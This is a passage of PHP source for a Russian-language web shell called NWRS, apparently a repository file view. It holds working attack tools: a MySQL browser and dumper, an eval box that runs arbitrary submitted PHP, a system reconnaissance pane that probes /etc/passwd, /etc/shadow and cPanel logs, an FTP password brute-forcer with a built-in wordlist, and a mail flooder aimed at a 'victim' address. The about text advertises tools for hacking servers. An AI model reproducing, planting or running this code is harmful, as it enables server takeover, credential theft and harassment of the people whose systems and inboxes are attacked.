- echo ">";
- echo " Таблица: <input type=text name=mysql_tbl size=15 value=";
- echo (!empty($_POST['mysql_tbl'])?($_POST['mysql_tbl']):("user"));
- echo ">";
- echo " Логин: <input type=text name=mysql_l size=15 value=";
- echo (!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"));
- echo ">";
- echo " Пароль: <input type=text name=mysql_p size=15 value=";
- echo (!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"));
- echo ">";
- echo "<input type=hidden name=dir size=85 value=".$dir.">";
- echo "<input type=hidden name=cmd size=85 value=mysql_dump>";
- echo "<br> Сохранить дамп в файле: <input type=checkbox name=dif value=1 id=dif><input type=text name=dif_name size=85 value=";
- echo (!empty($_POST['dif_name'])?($_POST['dif_name']):("dump.sql"));
- echo ">";
- echo "<input type=submit name=submit value=Сохранить>" ;
- echo "</font>";
- echo "</form>";
- print "<tr><td>";
- ###
- @$php_self=$_GET['PHP_SELF'];
- @$from=$_GET['from'];
- @$to=$_GET['to'];
- @$adress=$_POST['adress'];
- @$port=$_POST['port'];
- @$login=$_POST['login'];
- @$pass=$_POST['pass'];
- @$adress=$_GET['adress'];
- @$port=$_GET['port'];
- @$login=$_GET['login'];
- @$pass=$_GET['pass'];
- if(!isset($adress)){$adress="localhost";}
- if(!isset($login)){$login="root";}
- if(!isset($pass)){$pass="";}
- if(!isset($port)){$port="3306";}
- if(!isset($from)){$from=0;}
- if(!isset($to)){$to=50;}
- ?>
- <body vLink=white>
- <font color=black face=verdana size=1>
- <form> <? if(!@$conn){ ?>
- <table><tr><td valign=top>
- <input type=hidden name=ac value=sql>
- <tr><td valign=top>Хост: </tr><td><input name=adress value='<?=$adress?>' size=20></td></tr>
- <tr><td valign=top>Порт: </tr><td><input name=port value='<?=$port?>' size=6></td></tr>
- <tr><Td valign=top>Логин: </td><td><input name=login value='<?=$login?>' size=10></td></tr>
- <tr><Td valign=top>Пароль: </td><td> <input name=pass value='<?=$pass?>' size=10>
- <input type=hidden name=p value=sql></td></tr>
- <tr><td></td><td><input type=submit name=conn value=Подключиться></form></td></tr><?}?>
- <tr><td valign=top><? if(@$conn){ echo "<b>PHP v".@phpversion()."<br>mySQL v".@mysql_get_server_info()."<br>";}?></b></td><td>
- </td></tr>
- </table>
- <table width=100%><tr><td>
- <?
- @$conn=$_GET['conn'];
- @$adress=$_GET['adress'];
- @$port=$_GET['port'];
- @$login=$_GET['login'];
- @$pass=$_GET['pass'];
- if($conn){
- $serv = @mysql_connect("$adress:$port", "$login", "$pass") or die("ОШИБКА: ".mysql_error());
- if($serv){$status="Подключен. :: <a href='$php_self?conn=0'>Выйти из базы</a>";}else{$status="Отключен.";}
- print "<b><font color=green>Статус: $status<br><br>";
- print "<table cellpadding=0 cellspacing=0><tr><td valign=top>";
- print "<font color=red>[Таблицы]</font><Br><font color=white>";
- $res = mysql_list_dbs($serv);
- while ($str=mysql_fetch_row($res)){
- print "<b><a href='$php_self?ac=sql&base=1&db=$str[0]&p=sql&login=$login&pass=$pass&adress=$adress&conn=1&tbl=$str[0]'>$str[0]</a></b><br>";
- @$tc++;
- }
- $pro=" ";
- @$base=$_GET['base'];
- @$db=$_GET['db'];
- print "<font color=red>[Всего таблиц: $tc]</font><br>$pro";
- if($base){
- print "<div align=left><font color=green>Таблица: [$tbl]</div></font><br>";
- $result=mysql_list_tables($db);
- while($str=mysql_fetch_array($result)){
- $c=mysql_query ("SELECT COUNT(*) FROM $str[0]");
- $records=mysql_fetch_array($c);
- print "<font color=red>[$records[0]]</font> <a href='$php_self?ac=sql&inside=1&p=sql&vn=$str[0]&base=1&db=$db&login=$login&pass=$pass&adress=$adress&conn=1&tbl=$str[0]'>$str[0]</a><br>";
- mysql_free_result($c);
- }
- } #end base
- @$vn=$_GET['vn'];
- print "</td><td valign=top>";
- print "<font color=green>База данных: $db => $vn</font>";
- @$inside=$_GET['inside'];
- @$tbl=$_GET['tbl'];
- if($inside){
- print "<table cellpadding=0 cellspacing=1><tr>";
- mysql_select_db($db) or die(mysql_error());
- $c=mysql_query ("SELECT COUNT(*) FROM $tbl");
- $cfa=mysql_fetch_array($c);
- mysql_free_result($c);
- print " <br>";
- print "
- Всего: $cfa[0]<form>
- <input type=hidden name=ac value=sql>
- От: <input name=from size=3 value=0>
- До: <input name=to size=3 value=$cfa[0]>
- <input type=submit name=show value=Показать>
- <input type=hidden name=inside value=1>
- <input type=hidden name=vn value=$vn>
- <input type=hidden name=db value=$db>
- <input type=hidden name=login value=$login>
- <input type=hidden name=pass value=$pass>
- <input type=hidden name=adress value=$adress>
- <input type=hidden name=conn value=1>
- <input type=hidden name=base value=1>
- <input type=hidden name=p value=sql>
- <input type=hidden name=tbl value=$tbl>
- [<a href='$php_self?ac=sql&getdb=1&to=$cfa[0]&inside=1&vn=$vn&db=$db&login=$login&pass=$pass&adress=$adress&conn=1&base=1&p=sql&tbl=$tbl'>Загрузить</a>]
- </form>";
- @$vn=$_GET['vn'];
- @$from=$_GET['from'];
- @$to=$_GET['to'];
- @$from=$_GET['from'];
- @$to=$_GET['to'];
- if(!isset($from)){$from=0;}
- if(!isset($to)){$to=50;}
- $query = "SELECT * FROM $vn LIMIT $from,$to";
- $result = mysql_query($query);
- for ($i=0;$i<mysql_num_fields($result);$i++){
- $name=mysql_field_name($result,$i);
- print "<td> </td><td bgcolor=#BCE0FF> $name </td> ";
- }
- print "</tr>";
- while($mn = mysql_fetch_array($result, MYSQL_ASSOC)){
- print "<tr>";
- foreach ($mn as $come=>$lee) {
- $nst_inside=htmlspecialchars($lee);
- print "<td> </td><td bgcolor=silver>$nst_inside</td>\r\n";
- } print "</tr>";
- }
- mysql_free_result($result);
- print "</table>";
- } #end inside
- print "</td></tr></table>";
- } # end $conn
- ### end of sql
- print "</tr></td></table> </td></tr></table>";
- print $copyr;
- die;
- break;
- //PHP Eval Code execution
- case "eval":
- echo <<<HTML
- <b>Исполнение php-кода (без "< ? ? >")</b>
- <table>
- <form method="POST" action="$self">
- <input type="hidden" name="ac" value="eval">
- <tr>
- <td><textarea name="ephp" rows="10" cols="60"></textarea></td>
- </tr>
- <tr>
- <td><input type="submit" value="Enter"></td>
- $tend
- HTML;
- if (isset($_POST['ephp'])){
- eval($_POST['ephp']);
- }
- break;
- // SEND MAIL
- case "sendmail":
- echo <<<HTML
- <table>
- <form method="POST" action="$self">
- <input type="hidden" name="ac" value="sendmail">
- <tr>От кого: <br>
- <input type="TEXT" name="frommail">
- <br>Кому:<br> <input type="TEXT" name="tomailz">
- <br>Тема: <br><input type="TEXT" name="mailtema">
- <br>Текст: <br>
- <td><textarea name="mailtext" rows="10" cols="60"></textarea></td>
- </tr>
- <tr>
- <td><input type="submit" value="Отправить" name="submit"></td><form>
- $tend
- HTML;
- // никакая проверка не делается, а зачем ? =)
- if (isset($submit))
- {
- mail($tomailz,$mailtema,$mailtext,"From: $frommail");
- echo "<h2>Сообщение отправлено!</h2>";
- }
- break;
- // Информация о системе
- case "info":
- if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
- {
- $safemode = true;
- $hsafemode = "<font color=\"red\">Включено</font>";
- }
- else {$safemode = false; $hsafemode = "Отключено</font>";}
- /* display information */
- echo "<b>[ Информация о системе ]</b><br>";
- echo "<b>Хост:</b> ".$_SERVER["HTTP_HOST"]."<br>" ;
- echo "<b>IP сервера:</b> ".gethostbyname($_SERVER["HTTP_HOST"])."<br>";
- echo " <b>Сервер: </b>".$_SERVER['SERVER_SIGNATURE']." ";
- echo "<b>OC:</b> ".exec("uname -a")."(";
- print "".php_uname()." )<br>\n";
- echo "<b>Процессор:</b> ".exec("cat /proc/cpuinfo | grep GHz")."<br>";
- echo "<b>Привилегии: </b>".exec("id")."<br>";
- echo "<b>Всего места: </b>" . (int)(disk_total_space(getcwd())/(1024*1024)) . " MB " . "<b>Свободно</b>: " . (int)(disk_free_space(getcwd())/(1024*1024)) . " MB <br>";
- echo "<b>Текущий каталог:</b>".exec("pwd")."";
- echo " <br><b>Текуший web-путь: </b>".@$_SERVER['PHP_SELF']." ";
- echo "<br><b>Твой IP:</b> ".$_SERVER['REMOTE_HOST']." (".$_SERVER['REMOTE_ADDR'].")<br>";
- echo "<b>PHP version: </b>".phpversion()."<BR>";
- echo "<b> ID владельца процеса: </b>".get_current_user()."<BR>";
- echo "<b>MySQL</b> : ".mysql_get_server_info()."<BR>";
- if(file_exists('/etc/passwd') && is_readable('/etc/passwd')){
- print '<b>Есть доступ к /etc/passwd! </b><br>';
- }
- if(file_exists('/etc/shadow') && is_readable('/etc/shadow')){
- print '<b>Есть доступ к /etc/shadow!</b> <br>';
- }
- if(file_exists('/etc/shadow-') && is_readable('/etc/shadow-')){
- print '<b>Есть доступ к /etc/shadow-!</b> ';
- }
- if(file_exists('/etc/master.passwd') && is_readable('/etc/master.passwd')){
- print '<b>Есть доступ к /etc/master.passwd! </b><br>';
- }
- if(isset($_POST['th']) && $_POST['th']!=''){
- chdir($_POST['th']);
- };
- if(is_writable('/tmp/')){
- $fp=fopen('/tmp/qq8',"w+");
- fclose($fp);
- print "/tmp - открыта <br>\n";
- unlink('/tmp/qq8');
- }
- else{
- print "<font color=red>/tmp - не открыта</font><br>";
- }
- echo "<b>Безопасный режим: ".$hsafemode."</b><br>";
- if ($nixpasswd)
- {
- if ($nixpasswd == 1) {$nixpasswd = 0;}
- $num = $nixpasswd + $nixpwdperpage;
- echo "<b>*nix /etc/passwd:</b><br>";
- $i = $nixpasswd;
- while ($i < $num)
- {
- $uid = posix_getpwuid($i);
- if ($uid) {echo join(":",$uid)."<br>";}
- $i++;
- }
- }
- else {echo "<br><a href=?ac=navigation&d=/etc/&e=passwd><b><u>Get /etc/passwd</u></b></a><br>";}
- if (file_get_contents("/etc/userdomains")) {echo "<b><a href=\"".$surl."act=f&f=userdomains&d=/etc/&ft=txt\"><u><b>View cpanel user-domains logs</b></u></a></b><br>";}
- if (file_get_contents("/var/cpanel/accounting.log")) {echo "<b><a href=\"".$surl."act=f&f=accounting.log&d=/var/cpanel/&ft=txt\"><u><b>View cpanel logs</b></u></a></b><br>";}
- if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "<b><a href=?ac=navigation&d=/usr/local/apache/conf&e=httpd.conf><u><b>Конфигурация Apache (httpd.conf)</b></u></a></b><br>";}
- { echo "<b><a href=?ac=navigation&d=/etc/httpd/conf&e=httpd.conf><u><b>Конфигурация Apache (httpd.conf)</b></u></a></b><br>";}
- if (file_get_contents("/etc/httpd.conf")) {echo "<b><a href=?ac=navigation&d=/etc/&e=httpd.conf><u><b>Конфигурация Apache (httpd.conf)</b></u></a></b><br>";}
- if (file_get_contents("/etc/httpd.conf")) {echo "<b><a href=?ac=navigation&d=/var/cpanel&e=accounting.log><u><b>cpanel log </b></u></a></b><br>";}
- break;
-
- // О скрипте
- case "about":
- echo "<center><b>Привет всем!</b><br><br>
- Наконец-то NWRS доступен в первой стабильной версии! Добавилось множество новых полезных возможностей. Все функции скрипта работают и работают корректно. Добавлены уникальные инструменты для взлома сервера. В то же время нет ничего лишнего. Все, что задумывалось - реализировано. Думаю, каждый найдет в скрипте что-то полезное для себя. Также заявляю о том, что я закрываю проект, ибо он достиг идеала :) Любой может его продолжить, php - открытый язык. На первых порах скрипт вообще был только у нескольких человек узкого круга друзей, писал его для себя, из-за своей природной лени.
- Ну, и спасибо этим людям: Nitrex, Terabyte, 1dt_wolf, xoce, FUF, Shift, dodbob, m0zg, Tristram, Sanchous (орфография и дизайн)... И многим другим... Их идеи очень помогли воплотить в жизнь столь универсальный инструмент. Огромное спасибо им!<br><br><b>Помните: используя этот скрипт на чужих серверах, вы нарушаете закон :) Так что осторожнее.</b></center>";
- echo "<center><br><br><em>Посетите эти сайты, и вы всегда будете в курсе событий:</em><br><br>
- <a href='http://www.ru24-team.net'>www.ru24-team.net</a><br><br>
- <a href='http://www.web-hack.ru'>www.web-hack.ru</a><br><br>
- <a href='http://www.rst.void.ru'>www.rst.void.ru</a><br><br>
- <a href='http://www.hackru.info'>www.hackru.info</a><br><br>
- <a href='http://www.realcoding.net'>www.realcoding.net</a><br><br>
- <a href='http://www.ccteam.ru'>www.ccteam.ru</a><br><br>
- Извиняюсь, если кого забыл.<br> <em>Автор не несет ответственности за материалы, размещенные на этих сайтах, оcобенно на последнем </em>:)
- <br><br><br><br><br><b>Скрипт распространяется по лицензии GNU GPL<br> 22 Июля 2005 г. © DreAmeRz<br> e-mail:</b> <a href='mailto:dreamerz@mail.ru'>dreamerz@mail.ru</a><b> ICQ: </b>817312 <b>WEB: </b><a href='http://www.ru24-team.net'>http://www.Ru24-Team.NET</a>";
- break;
- // ФТП подбор паролей
- case "ftppass":
- $filename="/etc/passwd"; // passwd file
- $ftp_server="localhost"; // FTP-server
- echo "FTP-server: <b>$ftp_server</b> <br><br>";
- $fp = fopen ($filename, "r");
- if ($fp)
- {
- while (!feof ($fp)) {
- $buf = fgets($fp, 100);
- ereg("^([0-9a-zA-Z]{1,})\:",$buf,$g);
- $ftp_user_name=$g[1];
- $ftp_user_pass=$g[1];
- $conn_id=ftp_connect($ftp_server);
- $login_result=@ftp_login($conn_id, $ftp_user_name, $ftp_user_pass);
- if (($conn_id) && ($login_result)) {
- echo "<b>Подключение login:password - ".$ftp_user_name.":".$ftp_user_name."</b><br>";
- ftp_close($conn_id);}
- else {
- echo $ftp_user_name." - error<br>";
- }
- }}
- break;
- case "ftp":
- echo "
- <TABLE CELLPADDING=0 CELLSPACING=0 width=500 align=center>
- <form action='$PHP_SELF?ac=ftp' method=post><tr><td align=left valign=top colspan=3 class=pagetitle>
- <b><a href=?ac=ftppass>Проверить на связку login\password</a></b>
- </td></tr>
-
- <tr><td align=center class=pagetitle width=150> FTP Host:</td>
- <td align=left width=350>
- <input class='inputbox' type='text' name='host' size=50></td></tr>
- <tr><td align=center class=pagetitle width=150> Login:</td>
- <td align=left width=350>
- <input class='inputbox' type='text' name='login' size=50></td></tr>
- <tr><td align=center class=pagetitle width=150> Колличество паролей:</td>
- <td align=left width=350>
- <input class='inputbox' type='text' name='number' size=10> <1000 pass </td></tr>
- <tr><td align=center class=pagetitle width=150> Пароль для проверки:</td>
- <td align=left width=350>
- <input class='inputbox' type='text' name='testing' size=50>
- <input type='submit' value='Brut FTP' class=button1 $style_button><br><b>Лог сохраняется в pass.txt</b></td></tr>
-
- </form></table>";
-
-
- function s() {
- $word="qwrtypsdfghjklzxcvbnm";
- return $word[mt_rand(0,strlen($word)-1)];
- }
- function g() {
- $word="euioam";
- return $word[mt_rand(0,strlen($word)-2)];
- }
- function name0() { return s().g().s(); }
- function name1() { return s().g().s().g(); }
- function name2() { return s().g().g().s(); }
- function name3() { return s().s().g().s().g(); }
- function name4() { return g().s().g().s().g(); }
- function name5() { return g().g().s().g().s(); }
- function name6() { return g().s().s().g().s(); }
- function name7() { return s().g().g().s().g(); }
- function name8() { return s().g().s().g().g(); }
- function name9() { return s().g().s().g().s().g(); }
- function name10() { return s().g().s().s().g().s().s(); }
- function name11() { return s().g().s().s().g().s().s().g(); }
- $cool=array(1,2,3,4,5,6,7,8,9,10,99,100,111,111111,666,1978,1979,1980,1981,1982,1983,1984,1985,1986,1987,1988,1989,1990,1991,1992,1993,1994,1995,1996,1997,1998,1999,2000,2001,2002,2003,2004,2005);
- $cool2=array('q1w2e3','qwerty','qwerty111111','123456','1234567890','0987654321','asdfg','zxcvbnm','qazwsx','q1e3r4w2','q1r4e3w2','1q2w3e','1q3e2w','poiuytrewq','lkjhgfdsa','mnbvcxz','asdf','root','admin','admin123','lamer123','admin123456','administrator','administrator123','q1w2e3r4t5','root123','microsoft','muther','hacker','hackers','cracker');
- function randword() {
- global $cool;
- $func="name".mt_rand(0,11);
- $func2="name".mt_rand(0,11);
- switch (mt_rand(0,11)) {
- case 0: return $func().mt_rand(5,99);
- case 1: return $func()."-".$func2();
- case 2: return $func().$cool[mt_rand(0,count($cool)-1)];
- case 3: return $func()."!".$func();
- case 4: return randpass(mt_rand(5,12));
- default: return $func();
- }
-
-
- }
- function randpass($len) {
- $word="qwertyuiopasdfghjklzxcvbnm1234567890";
- $s="";
- for ($i=0; $i<$len; $i++) {
- $s.=$word[mt_rand(0,strlen($word)-1)];
- }
- return $s;
- }
- if (@unlink("pass.txt") < 0){
- echo "ничего нет";
- exit;
- }
- $file="pass.txt";
- if($file && $host && $login){
- $cn=mt_rand(30,30);
- for ($i=0; $i<$cn; $i++) {
- $s=$cool2[$i];
- $f=@fopen(pass.".txt","a+");
- fputs($f,"$s\n");
- }
-
- $cnt2=mt_rand(43,43);
- for ($i=0; $i<$cnt2; $i++) {
- $r=$cool[$i];
- $f=@fopen(pass.".txt","a+");
- fputs($f,"$login$r\n");
- }
- $p="$testing";
- $f=@fopen(pass.".txt","a+");
- fputs($f,"$p\n");
-
- $cnt3=mt_rand($number,$number);
- for ($i=0; $i<$cnt3; $i++) {
- $u=randword();
- $f=@fopen(pass.".txt","a+");
- fputs($f,"$u\n");
- }
-
- if(is_file($file)){
- $passwd=file($file,1000);
- for($i=0; $i<count($passwd); $i++){
- $stop=false;
- $password=trim($passwd[$i]);
- $open_ftp=@fsockopen($host,21);
- if($open_ftp!=false){
- fputs($open_ftp,"user $login\n");
- fputs($open_ftp,"pass $password\n");
- while(!feof($open_ftp) && $stop!=true){
- $text=fgets($open_ftp,4096);
- if(preg_match("/230/",$text)){
- $stop=true;
- $f=@fopen($host._ftp,"a+");
- fputs($f,"Enter on ftp:\nFTPhosting:\t$host\nLogin:\t$login\nPassword:\t$password\n ");
- echo "
- <TABLE CELLPADDING=0 CELLSPACING=0 width=500 align=center>
- <tr><td align=center class=pagetitle><b><font color=\"blue\">Поздравляю!!! Пароль подобран.</font></b><br>
- Коннект: <b>$host</b><br> Логин: <b>$login</b><br> Пароль: <b>$password</b></td></tr></table>
- ";exit;
- }
- elseif(preg_match("/530/",$text)){
- $stop=true;
-
- }
- }
- fclose($open_ftp);
- }else{
- echo "
- <TABLE CELLPADDING=0 CELLSPACING=0 width=500 align=center>
- <tr><td align=center class=pagetitle bgcolor=#FF0000><b>Неверно указан ftp хостинга!!! На <b><u>$host</u></b> закрыт 21 порт!</b></b></td></tr>
- </table>
- ";exit;
- }
- }
- }
- }
- break;
- // SQL Attack
- case "sql":
- break;
- // MailFlud
- case "mailfluder":
- $email=$_POST['email']; // Мыло жертвы
- $from=$_POST['from']; // Мыло жертвы
- $num=$_POST['num']; // Число писем
- $text=$_POST['text']; // Текст флуда
- $kb=$_POST['kb']; // Вес письма (kb)
- ?>
- <script language="JavaScript"><!--
- function reset_form() {
- document.forms[0].elements[0].value="";
- document.forms[0].elements[1].value="";
- document.forms[0].elements[2].value="";
- document.forms[0].elements[3].value="";
- document.forms[0].elements[4].value="";
- }
- //--></script>
- <?php
- if (($email!="" and isset($email)) and ($num!="" and isset($num)) and ($text!="" and isset($text)) and ($kb!="" and isset($kb))) {
- $num_text=strlen($text)+1; // Определяет длину текста + 1 (пробел в конце)
- $num_kb=(1024/$num_text)*$kb;
- $num_kb=ceil($num_kb);
- for ($i=1; $i<=$num_kb; $i++) {
- $msg=$msg.$text." ";
- }
- for ($i=1; $i<=$num; $i++) {
- mail($email, $text, $msg, "From: $from");
- }
- $all_kb=$num*$kb;
- echo <<<EOF
- <p align="center">Жертва: <b>$email</b><br>
- Кол-во писем: <b>$num</b><br>
- Общий посланный объем: <b>$all_kb kb</b><br></p>
- EOF;
- }
- else {
- echo <<<EOF
- <form action="?ac=mailfluder" method="post">
- <table align="center" border="0" bordercolor="#000000">
- <tr><td>Мыло жертвы</td><td><input type="text" name="email" value="to@mail.com" size="25"></td></tr>
- <tr><td>От липового мыла</td><td><input type="text" name="from" value="support@mail.com" size="25"></td></tr>
- <tr><td>Число писем</td><td><input type="text" name="num" value="5" size="25"></td></tr>
- <tr><td>Текст флуда</td><td><input type="text" name="text" value="fack fack fack" size="25"></td></tr>
- <tr><td>Вес письма (KB)</td><td><input type="text" name="kb" value="10" size="25"></td></tr>
- <tr><td colspan="2" align="center"><input type="submit"> <input type="button" onclick="reset_form()" value="Reset"></td></tr>
- </table>
- </form>…
Large files files are truncated, but you can click here to view the full file